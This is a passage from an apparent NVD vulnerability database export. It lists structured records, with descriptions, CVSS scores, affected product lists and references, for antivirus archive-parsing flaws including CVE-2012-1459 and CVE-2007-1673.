         value: "The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
      },
      {
         lang: "es",
         value: "El analizador de archivos TAR en AhnLab V3 Internet Security versión 2011.01.18.00, Avira AntiVir versión 7.11.1.163, Antiy Labs AVL SDK versión 2.0.3.7, avast! antivirus versiones 4.8.1351.0 y 5.0.677.0, AVG Anti-Virus versión 10.0.0.1190, Bitdefender versión 7.2, Quick Heal (también se conoce como Cat QuickHeal) versión 11.00, ClamAV versión 0.96.4, Command Antivirus versión 5.2.11.5, Comodo Antivirus versión 7424, Emsisoft Anti-Malware versión 5.1.0.1, F-Prot Antivirus versión 4.6.2.117, F-Secure Anti-Virus versión 9.0.16160.0, Fortinet Antivirus versión 4.2.254.0, G Data AntiVirus versión 21, Ikarus Virus Utilities T3 Command Line Scanner versión 1.1.97.0, Jiangmin Antivirus versión 13.0.900, K7 AntiVirus versión 9.77.3565, Kaspersky Anti-Virus versión 7.0.0.125, McAfee Anti-Virus Scanning Engine versión 5.400.0.1158, McAfee Gateway (anteriormente Webwasher) versión 2010.1C, Antimalware Engine versión 1.1.6402.0 en Microsoft Security Essentials versión 2.0, NOD32 Antivirus versión 5795, Norman Antivirus versión 6.06.12, nProtect antivirus versión 2011-01-17.01, Panda Antivirus versión 10.0.2.7, PC Tools AntiVirus versión 7.0.3.5, Rising Antivirus versión 22.83.00.03, Sophos Anti-Virus versión 4.61.0, AVEngine versión 20101.3.0.103 en Symantec Endpoint Protection versión 11, Trend Micro AntiVirus versión 9.120.0.1004, Trend Micro HouseCall versión 9.120.0.1004, VBA32 versión 3.12.14.2 y VirusBuster versión 13.6.151.0, permite a los atacantes remotos omitir la detección de malware por medio de una entrada de archivo TAR con un campo de longitud correspondiente a toda la entrada, además de parte del encabezado de la siguiente entrada. NOTA: esto podría dividirse (SPLIT) más adelante en varios CVE si se publica información adicional que muestre que el error se produjo de manera independiente en diferentes implementaciones de analizador de TAR.",
      },
   ],
   id: "CVE-2012-1459",
   lastModified: "2024-11-21T01:37:02.073",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "MEDIUM",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "NONE",
               baseScore: 4.3,
               confidentialityImpact: "NONE",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
               version: "2.0",
            },
            exploitabilityScore: 8.6,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2012-03-21T10:11:49.597",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80389",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80390",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80391",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80392",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80393",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80395",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80396",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80403",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80406",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80407",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80409",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/52623",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74302",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80389",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80390",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80391",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80392",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80393",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80395",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80396",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80403",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80406",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80407",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80409",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/52623",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74302",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-264",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2007-05-09 01:19
Modified
2024-11-21 00:28
Severity ?
Summary
unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.
Impacted products
Vendor Product Version
amavis amavis *
avast avast_antivirus *
avast avast_antivirus 4.6.394
avast avast_antivirus 4.7.652
avast avast_antivirus 4.7.700
avast avast_antivirus_home 4.0
avast avast_antivirus_home 4.6
avast avast_antivirus_home 4.6.652
avast avast_antivirus_home 4.6.655
avast avast_antivirus_home 4.6.665
avast avast_antivirus_home 4.6.691
avast avast_antivirus_home 4.7.827
avast avast_antivirus_home 4.7.827
avast avast_antivirus_home 4.7.844
avast avast_antivirus_home 4.7.844
avast avast_antivirus_home 4.7.869
avast avast_antivirus_home 4.7.869
avast avast_antivirus_home 4.7.1043
avast avast_antivirus_home 4.7.1043
avast avast_antivirus_home 4.7.1098
avast avast_antivirus_home 4.7.1098
avast avast_antivirus_professional 4.0
avast avast_antivirus_professional 4.6
avast avast_antivirus_professional 4.6.603
avast avast_antivirus_professional 4.6.652
avast avast_antivirus_professional 4.6.665
avast avast_antivirus_professional 4.6.691
avast avast_antivirus_professional 4.7.827
avast avast_antivirus_professional 4.7.827
avast avast_antivirus_professional 4.7.844
avast avast_antivirus_professional 4.7.844
avast avast_antivirus_professional 4.7.869
avast avast_antivirus_professional 4.7.1043
avast avast_antivirus_professional 4.7.1043
avast avast_antivirus_professional 4.7.1098
avira antivir *
avira antivir 6.35.00.00
avira antivir 7.04.00.23
avira antivir_personal *
avira antivir_personal *
avira antivir_personal *
avira antivir_personal *
avira antivir_personal 7
avira antivir_personal 7
panda panda_antivirus 2007
panda panda_antivirus_and_firewall 2007
picozip picozip *
rahul_dhesi zoo *
unzoo unzoo 4.4
winace winace *
barracuda_networks barracuda_spam_firewall *
barracuda_networks barracuda_spam_firewall model_100
barracuda_networks barracuda_spam_firewall model_200
barracuda_networks barracuda_spam_firewall model_300
barracuda_networks barracuda_spam_firewall model_400
barracuda_networks barracuda_spam_firewall model_500
barracuda_networks barracuda_spam_firewall model_600
barracuda_networks barracuda_spam_firewall model_800
barracuda_networks barracuda_spam_firewall model_900



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "64AF6FAE-B025-4F70-9F52-C7C12C6F705D",
                     versionEndIncluding: "2.4.1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "6AC3BF13-2946-411E-93A5-0C3AF0508C60",
                     versionEndIncluding: "4.7.980",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus:4.6.394:*:*:*:*:*:*:*",
                     matchCriteriaId: "8683D747-C092-4841-AABF-280D7EB771F0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus:4.7.652:*:*:*:*:*:*:*",
                     matchCriteriaId: "D393356E-0464-41B6-9D56-2DCFC6900244",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus:4.7.700:*:*:*:*:*:*:*",
                     matchCriteriaId: "0ED7C89E-E28B-4BE9-952D-86A8D089B41D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1519A450-8F71-408A-81B8-AA6F337E7A25",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.6:*:*:*:*:*:*:*",
                     matchCriteriaId: "48872452-2B26-44C4-A9FF-0D9D23AAC95A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.6.652:*:*:*:*:*:*:*",
                     matchCriteriaId: "275D7948-61FB-4415-A9EB-59EEF9757149",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.6.655:*:*:*:*:*:*:*",
                     matchCriteriaId: "5CCC4081-D877-4DE3-9342-59BCE7C41CE2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.6.665:*:*:*:*:*:*:*",
                     matchCriteriaId: "B189DFCB-2307-43B4-8102-BA725CEE0711",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.6.691:*:*:*:*:*:*:*",
                     matchCriteriaId: "3C733E69-33B3-465B-B146-A68C26373E00",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:*:*:*:*:*:*",
                     matchCriteriaId: "2EF16A3D-BC29-4426-BDF5-F1C6E85228B0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.827:*:windows:*:*:*:*:*",
                     matchCriteriaId: "33A71A2C-36AC-4F36-9D94-AA824F4DE14C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:*:*:*:*:*:*",
                     matchCriteriaId: "E02983BB-F027-4967-A230-933299D2D061",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.844:*:windows:*:*:*:*:*",
                     matchCriteriaId: "62618C12-3EAC-4434-B2A8-D83612F1A05C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:*:*:*:*:*:*",
                     matchCriteriaId: "238FB2B1-41CF-46DB-8ED7-7F2B6609C27D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.869:*:windows:*:*:*:*:*",
                     matchCriteriaId: "B949535B-9771-4AC6-BBDB-8BB3A789A1FA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:*:*:*:*:*:*",
                     matchCriteriaId: "97FEA351-FFF6-4452-9A2B-A7AAF4D7EE20",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1043:*:windows:*:*:*:*:*",
                     matchCriteriaId: "DC6DA89A-BF71-4031-9B51-E5941FDE5E15",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:*:*:*:*:*:*",
                     matchCriteriaId: "18837F1C-8ECD-4202-9489-08D63FB28CDB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_home:4.7.1098:*:windows:*:*:*:*:*",
                     matchCriteriaId: "DB201D49-EB74-4A5D-B641-86C4429E3EC0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "231DDF5E-5026-4844-8374-45F0926F8C4F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.6:*:*:*:*:*:*:*",
                     matchCriteriaId: "8822D55C-FEE7-41B5-A8D5-8D9F514CF815",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.603:*:*:*:*:*:*:*",
                     matchCriteriaId: "B89C0CA4-00DE-4CAD-B554-36C46815A919",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.652:*:*:*:*:*:*:*",
                     matchCriteriaId: "A618B922-80E7-4769-90BA-5FE231DA6B89",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.665:*:*:*:*:*:*:*",
                     matchCriteriaId: "40F19B83-BAD9-4CDC-95C5-6D352F223AA9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.6.691:*:*:*:*:*:*:*",
                     matchCriteriaId: "762B6C23-5ADD-4221-8146-DF9CE95637BB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:*:*:*:*:*:*",
                     matchCriteriaId: "2F3B1651-DC3E-43B8-A5A4-8BEF7D668EEC",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.827:*:windows:*:*:*:*:*",
                     matchCriteriaId: "DF2D8C10-01E4-43D7-93EE-342BA7E9C489",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:*:*:*:*:*:*",
                     matchCriteriaId: "3D0980CA-26A4-468E-82F3-E03953250343",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.844:*:windows:*:*:*:*:*",
                     matchCriteriaId: "AAB7888A-E884-4C73-AF10-698C56E080F3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.869:*:*:*:*:*:*:*",
                     matchCriteriaId: "FF5B2325-D8EE-4D1E-8291-740726FC1EF6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:*:*:*:*:*:*",
                     matchCriteriaId: "FB0EF168-1F0D-4772-8922-0A75CAF28661",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1043:*:windows:*:*:*:*:*",
                     matchCriteriaId: "1F7F2957-4422-4891-B573-F68882D7C8E1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avast:avast_antivirus_professional:4.7.1098:*:*:*:*:*:*:*",
                     matchCriteriaId: "5CAED694-2497-488B-A2AB-0781501678F4",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "FDD00670-7EC0-4AA4-98EF-C8AE38330284",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:6.35.00.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C23C179C-B50E-4F47-BFFA-85848131C99D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:7.04.00.23:*:*:*:*:*:*:*",
                     matchCriteriaId: "5C813AD8-5D73-41DF-B710-3CEB20FB9EF2",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "B38A75AF-D8B4-4B54-87E9-6EED562CAAC1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:*:*:classic:*:*:*:*:*",
                     matchCriteriaId: "5DB520B5-36E8-4F4B-99FF-0FF3F708CC8A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:*:*:premium:*:*:*:*:*",
                     matchCriteriaId: "BECD1C6B-EC0F-4203-BA12-F8B02472FF4C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "CD267D52-D580-4460-AFF9-E5BA478A98FA",
                     versionEndIncluding: "7.3.0.5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:7:*:*:*:*:*:*:*",
                     matchCriteriaId: "64D94528-A54F-439B-8584-57A82CDF7318",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:7:*:classic:*:*:*:*:*",
                     matchCriteriaId: "DB66A5A4-6758-438D-9155-7475A5406DA5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:panda:panda_antivirus:2007:*:*:*:*:*:*:*",
                     matchCriteriaId: "A9F9AF4F-E974-4D6F-AF51-0DA7A59E64FD",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:panda:panda_antivirus_and_firewall:2007:*:*:*:*:*:*:*",
                     matchCriteriaId: "C4DBEED1-0648-45F3-AFC2-91C872A1B098",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:picozip:picozip:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "6AD36471-D8DC-4B11-B53B-264AB1560063",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:rahul_dhesi:zoo:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "79845C9F-7884-4F77-B492-4A944D3DCCEA",
                     versionEndIncluding: "2.10",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:unzoo:unzoo:4.4:*:*:*:*:*:*:*",
                     matchCriteriaId: "B93C2E82-03E5-42CE-A589-B82FBCBE7D52",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:winace:winace:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "BF7B6EE8-25D5-4C89-A0B8-A069D330A9D9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "0D03D666-D234-4626-82F9-EC5726BE1920",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_100:*:*:*:*:*:*:*",
                     matchCriteriaId: "D0BEEFB2-C6ED-43D5-B535-623931C38890",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_200:*:*:*:*:*:*:*",
                     matchCriteriaId: "C2ECF7F8-A29F-4868-9DE5-4227E5DA2285",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_300:*:*:*:*:*:*:*",
                     matchCriteriaId: "6A897043-9003-4F27-8C7D-AE6B2BD0389C",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_400:*:*:*:*:*:*:*",
                     matchCriteriaId: "1F05FEF8-6B34-4874-AD6B-A053415BD939",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_500:*:*:*:*:*:*:*",
                     matchCriteriaId: "D28FAD61-3723-4CCC-B890-C5869E7AC3EB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_600:*:*:*:*:*:*:*",
                     matchCriteriaId: "7697AAC2-EC8A-496E-9336-29AAE61CD69E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_800:*:*:*:*:*:*:*",
                     matchCriteriaId: "BAA47F3A-44BA-4011-8A44-1AE54D02E772",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:model_900:*:*:*:*:*:*:*",
                     matchCriteriaId: "423620AD-EA6A-4730-B97A-DF67247372BE",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.",
      },
      {
         lang: "es",
         value: "El archivo unzoo.c, tal como se utiliza en varios productos, incluyendo AMaViS versión 2.4.1 y anteriores, permite a los atacantes remotos causar una denegación de servicio (bucle infinito) por medio de un archivo ZOO con una estructura direntry que apunta hacia un archivo anterior.",
      },
   ],
   evaluatorSolution: "http://xforce.iss.net/xforce/xfdb/34080\r\n\r\n\r\nFor Barracuda Spam Firewall:\r\nUpgrade to the latest virus definition version of Barracuda Spam Firewall (virusdef 2.0.6399 for 3.4 and after or virusdef 2.0.6399o for prior to 3.4), available from the automatic update.\r\n\r\nFor Panda Software Antivirus:\r\nUpgrade to the latest version of Panda Software Antivirus (4/2/2007 or later), available from the automatic update feature.\r\n\r\nFor avast! antivirus:\r\nUpgrade to the latest version of Panda Software Antivirus (4.7.981 or later), available from the avast! antivirus Web site. See references.\r\n\r\nFor Avira AntiVir:\r\nUpgrade to the latest version of Avira AntiVir (avpack32.dll version 7.3.0.6 or later), available from the automatic update feature.\r\n\r\nFor AMaViS:\r\nRefer to ASA-2007-2 for patch, upgrade, or suggested workaround information. See References.",
   id: "CVE-2007-1673",
   lastModified: "2024-11-21T00:28:54.050",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.8,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2007-05-09T01:19:00.000",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/36208",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25315",
      },
      {
         source: "cve@mitre.org",
         url: "http://securityreason.com/securityalert/2680",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.amavis.org/security/asa-2007-2.txt",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Exploit",
         ],
         url: "http://www.securityfocus.com/bid/23823",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/36208",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25315",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://securityreason.com/securityalert/2680",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.amavis.org/security/asa-2007-2.txt",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Exploit",
         ],
         url: "http://www.securityfocus.com/bid/23823",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-399",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2007-06-01 01:30
Modified
2024-11-21 00:32
Severity ?
Summary
The file parsing engine in Avira Antivir Antivirus before 7.04.00.24 allows remote attackers to cause a denial of service (application crash) via a crafted UPX compressed file, which triggers a divide-by-zero error.
References
cve@mitre.org | http://forum.antivir-pe.de/thread.php?threadid=22528 | Patch
cve@mitre.org | http://marc.info/?l=full-disclosure&m=118040810718045&w=2
cve@mitre.org | http://osvdb.org/36710
cve@mitre.org | http://secunia.com/advisories/25417 | Patch, Vendor Advisory
cve@mitre.org | http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt | Vendor Advisory
cve@mitre.org | http://www.securityfocus.com/archive/1/469880/100/0/threaded
cve@mitre.org | http://www.securityfocus.com/bid/24187 | Patch
cve@mitre.org | http://www.securitytracker.com/id?1018132
cve@mitre.org | http://www.vupen.com/english/advisories/2007/1971
cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/34556
af854a3a-2127-422b-91ae-364da2661108 | http://forum.antivir-pe.de/thread.php?threadid=22528 | Patch
af854a3a-2127-422b-91ae-364da2661108 | http://marc.info/?l=full-disclosure&m=118040810718045&w=2
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/36710
af854a3a-2127-422b-91ae-364da2661108 | http://secunia.com/advisories/25417 | Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt | Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/archive/1/469880/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/24187 | Patch
af854a3a-2127-422b-91ae-364da2661108 | http://www.securitytracker.com/id?1018132
af854a3a-2127-422b-91ae-364da2661108 | http://www.vupen.com/english/advisories/2007/1971
af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/34556
Impacted products
Vendor Product Version
avira antivir *
avira av_pack *



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "445D730C-D41D-4014-8F47-42941554D65A",
                     versionEndIncluding: "7.04.00.23",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:av_pack:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A9634F84-4E81-45F8-B040-9E08B30BF190",
                     versionEndIncluding: "7.03.00.08",
